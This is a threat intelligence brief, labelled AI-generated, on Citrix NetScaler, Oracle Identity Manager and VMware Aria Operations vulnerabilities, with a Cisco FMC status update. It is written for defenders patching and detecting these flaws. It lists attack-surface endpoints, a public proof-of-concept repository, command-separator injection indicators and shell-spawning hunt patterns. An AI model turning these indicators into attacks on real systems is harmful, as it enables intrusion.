Cyber Threat Brief — March 24 2026
⚠️ This report is AI-generated. Always validate findings.
Previous brief: Cyber Threat Brief — March 23 2026
Threat count: 3 new threats, 1 status update
1. Citrix NetScaler SAML Memory Leak — CVE-2026-3055
TL;DR: Unauthenticated OOB memory read (CVSS 9.3) in NetScaler ADC/Gateway appliances configured as SAML IDP disclosed March 23; no PoC yet but NetScaler is a top-tier target for exploitation within days of disclosure.
What’s New:
- Citrix published CTX696300 on March 23 for CVE-2026-3055 (OOB read) and CVE-2026-4368 (reflected XSS)
- Affects NetScaler ADC/Gateway 14.1 before 14.1-66.59, 13.1 before 13.1-62.23, and 13.1-FIPS/NDcPP before 13.1-37.262
- Only appliances configured as SAML Identity Provider are vulnerable — check config for
add authentication samlIdPProfile - No ITW exploitation or public PoC yet; Rapid7 and Arctic Wolf both flagged high likelihood of near-term weaponization
- Cloud-managed instances are not affected
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
add authentication samlIdPProfile in ns.conf | Config indicator | T1190 | NetScaler config / CLI | Audit all appliances for SAML IDP config |
| NetScaler ADC 14.1 < 14.1-66.59, 13.1 < 13.1-62.23 | Vuln version | T1190 | Asset inventory / VA scanner | Patch immediately |
Anomalous SAML auth traffic to /saml/login endpoints | Exploitation indicator | T1190 | WAF / NetScaler syslog | Monitor for unusual SAML request patterns |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No specific NetScaler SAML memory read detection; gap for SAML endpoint abuse |
| Elastic | None | No NetScaler-specific rules |
| Sigma | None | No coverage; need rule for anomalous SAML IDP traffic patterns on NetScaler |
Sources: Citrix CTX696300, Rapid7 ETR, Arctic Wolf
2. Oracle Identity Manager Pre-Auth RCE — CVE-2026-21992
TL;DR: CVSS 9.8 unauthenticated RCE in Oracle Identity Manager and Web Services Manager REST endpoints; emergency out-of-band patch issued March 19. Predecessor CVE-2025-61757 was exploited ITW and added to CISA KEV in November 2025.
What’s New:
- Oracle issued emergency security alert March 19 for CVE-2026-21992, outside normal quarterly patch cycle
- Pre-auth RCE via REST WebServices (OIM) and Web Services Security (WSM) components — network-based, low complexity, no user interaction
- Affects versions 12.2.1.4.0 and 14.1.2.1.0 of both products
- CVE-2025-61757 (same component, same CVSS) was exploited ITW and added to CISA KEV November 2025 — pattern repeat highly likely
- No public PoC yet but out-of-band patch signals Oracle saw credible threat
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
OIM REST API endpoints (/iam/governance/selfservice/api/v1/) | Attack surface | T1190 | WAF / reverse proxy / OIM access logs | Block unauthenticated access; monitor for anomalous REST calls |
| Oracle Identity Manager 12.2.1.4.0, 14.1.2.1.0 | Vuln version | T1190 | Asset inventory | Apply emergency patch immediately |
| Oracle Web Services Manager 12.2.1.4.0, 14.1.2.1.0 | Vuln version | T1190 | Asset inventory | Apply emergency patch immediately |
| Unexpected child processes from OIM/WebLogic JVM | Post-exploitation | T1059 | EDR / process telemetry | Hunt for java spawning cmd.exe, sh, bash, powershell |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Oracle Identity Manager specific rules; generic “Java Process Spawning Shell” partially applicable |
| Elastic | Web Shell Detection: Script Process Child of Common Web Processes | Partial — covers post-exploitation shell spawning from web processes |
| Sigma | Suspicious Java Process Spawning Shell (generic) | Partial — needs OIM-specific process path tuning |
Sources: Oracle Security Alert, Help Net Security, Dark Reading
3. VMware Aria Operations Command Injection — CVE-2026-22719
TL;DR: CISA KEV-listed command injection (CVSS 8.1) with confirmed exploitation ITW; federal remediation deadline is today, March 24. Exploitation occurs during support-assisted migration workflows.
What’s New:
- CISA added to KEV on March 3 citing active exploitation; federal deadline March 24, 2026 (today)
- Unauthenticated command injection during support-assisted product migration — attacker-controlled input passed to OS commands without sanitization
- Broadcom acknowledged reports of exploitation but cannot independently confirm
- Companion vulns CVE-2026-22720 (stored XSS) and CVE-2026-22721 (privilege escalation to admin) patched in same bulletin
- Workaround available:
aria-ops-rce-workaround.shscript run as root on each VA node
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Aria Operations 8.x < 8.18.6, Cloud Foundation Ops 9.x < 9.0.2.0 | Vuln version | T1190 | Asset inventory | Patch to 8.18.6 / 9.0.2.0 or apply workaround script |
Command separators (;, |, &, backticks) in migration API parameters | Exploitation payload | T1059.004 | Aria Operations application logs / WAF | Alert on shell metacharacters in migration workflow requests |
| Unexpected shell processes spawned by Aria Operations services | Post-exploitation | T1059.004 | EDR / process telemetry | Hunt for bash/sh child processes from Aria Ops Java/Tomcat |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Aria Operations-specific rules |
| Elastic | None | No VMware Aria-specific coverage |
| Sigma | None | Gap — need rule for Aria Operations migration endpoint abuse and shell spawning |
Sources: CISA KEV Catalog, BleepingComputer, SOCRadar, Qualys ThreatPROTECT
Status Updates
- CVE-2026-20131 (Cisco FMC): CISA added to KEV March 20 with federal deadline March 22 (passed). Public PoC on GitHub (
p3Nt3st3r-sTAr/CVE-2026-20131-POC). Interlock ransomware exploitation ongoing since January 26. If unpatched, treat as compromised. Original brief. - CVE-2026-22719 (VMware Aria Ops): Federal deadline today March 24. See threat #3 above for full coverage.